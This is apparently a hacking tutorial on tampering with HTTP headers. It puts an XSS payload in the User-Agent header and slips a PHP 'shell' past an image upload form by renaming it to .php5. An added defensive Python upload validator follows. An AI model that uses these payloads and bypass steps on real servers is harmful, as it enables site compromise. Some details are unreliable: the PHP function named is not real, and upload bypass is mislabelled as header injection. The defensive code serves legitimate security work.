1. What is HTTP header injection?

HTTP header injection is a vulnerability that occurs when HTTP headers are built from unvalidated user input. Header injection in
HTTP responses can enable HTTP response splitting and XSS attacks.

2. HTTP Header Injection

We can use "Live HTTP Headers" or "Tamper Data" if we are using Firefox. Say this is what gets recorded when you browse to google.ca.

Host [google.ca]
User-Agent [Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4]
Accept [text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language [en-us,en;q=0.5]
Accept-Encoding [gzip, deflate]
Accept-Charset [ISO-8859-1,utf-8;q=0.7,*;q=0.7]
Keep-Alive [300]
Connection [keep-alive]

Now, with Tamper Data or Live HTTP Headers, we change the User-Agent header to:

Host [google.ca]
User-Agent [<script>alert(String.fromCharCode(88,83,83))</script>]
Accept [text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language [en-us,en;q=0.5]
Accept-Encoding [gzip, deflate]
Accept-Charset [ISO-8859-1,utf-8;q=0.7,*;q=0.7]
Keep-Alive [300]
Connection [keep-alive]

Now, click "OK" if you are using Tamper Data, and click "Replay" if you are using Live HTTP Headers.

If we try to upload something like a shell through an image upload form, disguised as our "image", this is what gets recorded:

Host [google.ca]
User-Agent [Mozilla/5.0 and all that other stuff...]
Accept [text/html,application/xhtml+xml, etc...]
Accept-Language [en-us,en;q=0.6]
Accept-Encoding [gzip,deflate]
Accept-Charset [ISOKAOAKOFASfaS]
Keep-Alive [300]
Connection [keep-alive]
Referer [google.ca]
Content-Type [multipart/form-data; boundary=--29847239576353486787]

Content-Disposition: form-data; name="image"; filename="pedobear.bmp"
Content-Type: image/bmp

<?php
// System EXEC example
system_exec('whoami');
?>

--29847239576353486787

We can see the PHP code in the request body, so now we change the filename extension to something like .php5 or .php:

Content-Disposition: form-data; name="image"; filename="pedobear.php5"
Content-Type: image/bmp

<?php
// System EXEC example
system_exec('whoami');
?>

Now we get an error saying the POST body is too long, because the Content-Length header no longer matches the edited body. Just send the request again without the Content-Length header.

If the upload form is vulnerable, the shell will be accepted and stored on the server.
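From the defender's side, here is an added example (not code from the original post) of the server-side check that stops the rename trick above: the client-supplied Content-Type and filename are never trusted, every extension in the name must be on an image allowlist, the leading bytes must match that image type, and the stored name is generated by the server. The allowlist, its magic bytes and the sample inputs are constructed for the example.

```python
import os
import re
import secrets
from typing import Tuple

# Constructed allowlist: extension -> magic bytes the file must start with.
ALLOWED = {
    "bmp": (b"BM",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason_or_stored_name) for an uploaded file.

    The multipart Content-Type sent by the client is deliberately not an
    argument: it is attacker-controlled, so the decision rests on the full
    list of extensions in the name plus the file's leading bytes.
    """
    # Keep only the last path component, so "../x.bmp" and "..\\x.bmp" become "x.bmp".
    base = os.path.basename(filename.replace("\\", "/"))
    if base.startswith(".") or not re.fullmatch(r"[A-Za-z0-9_.-]+", base):
        return False, "filename has unexpected characters"
    parts = base.lower().split(".")
    if len(parts) < 2:
        return False, "no extension"
    # Check every extension, so "shell.php.bmp" and "pedobear.php5" both fail.
    exts = parts[1:]
    for ext in exts:
        if ext not in ALLOWED:
            return False, f"extension '{ext}' not in allowlist"
    # The claimed type must be backed by the bytes, not by the client's header.
    if not any(data.startswith(magic) for magic in ALLOWED[exts[-1]]):
        return False, "content does not match the claimed image type"
    # The server picks the stored name; the client's name never reaches the disk.
    return True, f"{secrets.token_hex(16)}.{exts[-1]}"


if __name__ == "__main__":
    # Constructed sample requests: the renamed script from the post and a real bitmap.
    print(validate_upload("pedobear.php5", b"<?php echo 1; ?>"))
    print(validate_upload("photo.bmp", b"BM" + bytes(12)))
```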
